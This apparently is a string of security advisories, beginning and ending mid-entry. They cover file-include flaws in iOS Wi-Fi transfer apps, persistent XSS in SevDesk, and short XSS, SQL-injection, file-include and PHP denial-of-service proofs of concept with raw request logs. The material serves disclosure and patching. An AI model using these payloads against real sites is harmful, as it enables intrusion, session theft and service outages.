Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[55774]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[62]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mo., 09 März 2015 14:24:13 GMT]
Reference(s):
http://localhost:8080/files/
http://localhost:8080/jquery.js
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Photo Manager Pro v4.4.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1445
Release Date:
=============
2015-03-12
Vulnerability Laboratory ID (VL-ID):
====================================
1445
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-03-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of
the `wifi interface` in connection with the vulnerable upload service module.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique
local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or device compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] upload.action
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] disp_photo.action
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png
PoC: Vulnerable Source
<div id="photo_content">
<img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div>
--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/upload.action?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/upload.html?folderID=5]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------15932100885119
Content-Disposition: form-data; name="is_submitted"
false
-----------------------------15932100885119
Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/upload.html?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[8085]
Date[Do., 05 März 2015 20:52:18 GMT]
Reference(s):
http://localhost:8080/upload.action?folderID=
http://localhost:8080/upload.html?folderID=
http://localhost:8080/disp_photo.action?filename=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Security Risk:
==============
The security risk of thelocal file inelcude web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1314
Release Date:
=============
2015-03-23
Vulnerability Laboratory ID (VL-ID):
====================================
1314
Common Vulnerability Scoring System:
====================================
5.9
Product & Service Introduction:
===============================
The integrated customer management, digital customer file is the central record for a single customer. invoices, facilities and operations
to a customer are stored centrally automated in one place. So the customer file is always up to date. For faster retrieval or reporting
contacts can be tagged. In addition, with powerful. Search options you have as the entire customer base better than ever in view.
Daily backup
256bit SSL encryption
TÜV certified datacenter
Free version
No hidden costs
No minimum contract term
iPhone App
Runs in any browser
No installation required on the PC
Easy to use
Reduced to the essentials
Automated, where it is only Possible
(Copy of the Vendor Homepage: https://sevdesk.de/)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service.
Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2014-09-07: Vendor Response/Feedback (SevDesk Developer Team)
2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team)
2015-03-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SevenIT
Product: SevDesk - Web Application 3.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application.
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the
vulnerable web-application module or service.
The security vulnerability is located in the `firstname`, `surname` & `family` name values of the main sevDesk `Dasboard` application module.
Remote attackers are able to inject own codes to the main dashboard service by manipulation of the registration username. The execution of
the injected script code occurs on the application-side in the main dasboard module through the rightHead and feedcontent class. The attack
vector is persistent and the request method to inject the code is POST. The victim user can also change the name by usage of the application
which does not require an admins interaction on successful exploitation.
The security risk of the persistent script code inject web vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system)
count of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct
user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects
to malicious source and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Registration to SevDesk
Vulnerable Parameter(s):
[+] surname
[+] firstname
[+] family name
Affected Module(s):
[+] Dasboard Index - rightHead & feedcontent
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by low privileged application user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability
1. Register an account by usage of the following webpage https://my.sevdesk.de/register/
2. Include to the surname, family name and firstname your own script code as payload
3. Save the registration form and go to the website https://my.sevdesk.de/
4. Login with the user account data
5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dasboard index (rightHead < name > feedcontent)
6. Successful reproduce of the application-side security vulnerability!
PoC: rightHead > Displayname (First- & Lastname)
<div id="middleHead">
<input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." />
</div>
<div id="rightHead">
<div style="float:right;margin-top:5px;text-align: right;padding-right:5px;">
<div style="color:#fff;padding:3px;margin-bottom:2px;">
<span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div>
<a href="/admin/company">Einstellungen</a> |
<a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a>
</div>
</div>
</div>
</div>
<div id="headNav" style="top:80px;">
<div class="headwrapper">
<ul id="mainNavigation">
PoC: Verlauf > feedcontent
<div>
<div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent">
a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des
<img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf
"archiviert" geändert
</div></div><div class="clearfix"></div></div>
<div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14
--- PoC Session Logs [POST] (Registration sevDesk) ---
Status: 200[OK]
POST https://my.sevdesk.de/register/save Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html]
Request Header:
Host[my.sevdesk.de]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://my.sevdesk.de/register]
Content-Length[119]
Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411;
optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149;
__utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586;
km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]]
surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]]
familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]]
username[support%40vulnerability-lab.com]
password[chaos666]
Response Header:
Date[Tue, 02 Sep 2014 11:44:30 GMT]
Server[Apache/2.2.22 (Debian)]
X-Powered-By[PHP/5.4.4-14+deb7u7]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[94]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=utf-8]
Reference(s):
https://my.sevdesk.de/register/save
Solution - Fix & Patch:
=======================
The vulnerbility can be patched by a secure parse and encode of the affected rightHead & feedcontent values in the dashboard application index.
Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the important name values.
Note: The issue has been patched by the manufacturer since 2015-02-01
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities in the main dasboard application is estimated as medium. (CVSS 5.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1447
Release Date:
=============
2015-03-13
Vulnerability Laboratory ID (VL-ID):
====================================
1447
Common Vulnerability Scoring System:
====================================
6.3
Product & Service Introduction:
===============================
This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.
Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2015-03-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mindspeak Software
Product: Wifi Drive Pro - iOS Mobile Web Application 1.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable file upload POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:49276/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: GET
http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
PoC: Vulnerable Source
<p><a href="..">..</a><br>
<a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>
--- PoC Session Logs [POST] (Inject)---
Status: 200[OK]
POST http://localhost:49276/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:49276]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:49276/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------28140821932238
Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png
Reference(s):
http://localhost:49276/
http://localhost:49276//%3C./
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
source: https://www.securityfocus.com/bid/52059/info
ButorWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ButorWiki 3.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
source: https://www.securityfocus.com/bid/52058/info
Pandora FMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Pandora FMS 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!]
source: https://www.securityfocus.com/bid/52053/info
CMS Faethon is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Faethon 1.3.4 is vulnerable; other versions may also be affected.
http://www.example.com/articles.php?by_author=[SQL]
http://www.example.com/article.php?id=[SQL]
source: https://www.securityfocus.com/bid/52043/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.
PHP versions prior to 5.3.9 are vulnerable.
<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>
source: https://www.securityfocus.com/bid/52046/info
Tube Ace is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=
#####################################################################################
Title: Oracle Outside-In DOCX File Parsing Memory Corruption
Platforms: Windows
CVE:
Secunia:
{PRL}: 2015-04
Author: Francis Provencher (Protek Research Lab’s)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-17: Francis Provencher from Protek Research Lab’s found the issue;
2015-02-18: Oracle Security Alerts confirmed the issue;
2015-04-15: Oracle release a Patch for this issue.
#####################################################################################
============================
3) Technical details
============================
The vulnerability is caused due to a certain value in a document, which can be exploited to corrupt memory via a specially crafted document.
Successful exploitation may allow execution of arbitrary code.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-04.docx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36788.docx
source: https://www.securityfocus.com/bid/52026/info
LEPTON is prone to multiple input-validation vulnerabilities, including:
1. A cross-site scripting vulnerability
2. An SQL-injection vulnerability
3. A local file-include vulnerability
4. Multiple HTML-injection vulnerabilities
Exploiting these issues could allow an attacker to execute arbitrary script and PHP code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LEPTON 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/admins/login/forgot/index.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Wolf CMS Arbitrary File Upload Exploit
Date : 22 April 2015
Exploit Author : CWH Underground
Discovered By : ZeQ3uL
